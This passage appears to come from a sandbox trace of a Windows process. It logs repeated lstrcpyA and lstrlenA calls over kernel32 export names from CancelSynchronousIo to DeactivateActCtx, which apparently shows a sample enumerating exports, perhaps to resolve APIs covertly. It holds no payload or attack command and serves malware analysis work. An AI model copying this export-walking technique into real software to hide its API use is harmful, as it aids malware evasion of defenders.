lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.565] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.565] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.565] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.565] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.565] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.565] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.565] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.565] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.565] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.565] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.565] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.565] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.565] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.565] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.565] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.565] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.565] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.565] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.566] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.566] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.566] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.566] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.566] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.566] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.566] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.566] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.566] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.566] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.566] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.566] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.566] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.566] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.567] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.567] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.567] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.567] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.567] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.567] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.567] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.567] lstrlenA (lpString="COPYFILEA") returned 9 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.567] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.567] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.567] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.567] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.567] lstrlenA (lpString="COPYFILEW") returned 9 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.567] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.567] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.567] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.567] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.567] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.567] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.568] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.568] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.568] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.568] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.568] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.568] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.568] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.568] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.568] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.568] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.568] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.568] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.568] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.568] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.568] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.568] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.568] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.568] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.568] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.568] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.569] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.569] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.569] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.569] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.569] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.569] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.569] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.569] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.569] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.569] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.569] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.569] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.569] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.569] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.569] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.569] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.569] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.569] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.569] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.569] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.570] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.570] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.570] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.570] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.570] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.570] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.570] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.570] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.570] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.570] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.570] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.570] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.570] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.570] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.570] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.570] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.570] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.570] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.570] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.571] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.571] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.571] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.571] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.571] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.571] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.571] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.571] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.571] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.571] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.571] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.571] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.571] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.571] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.571] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.571] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.571] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.571] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") 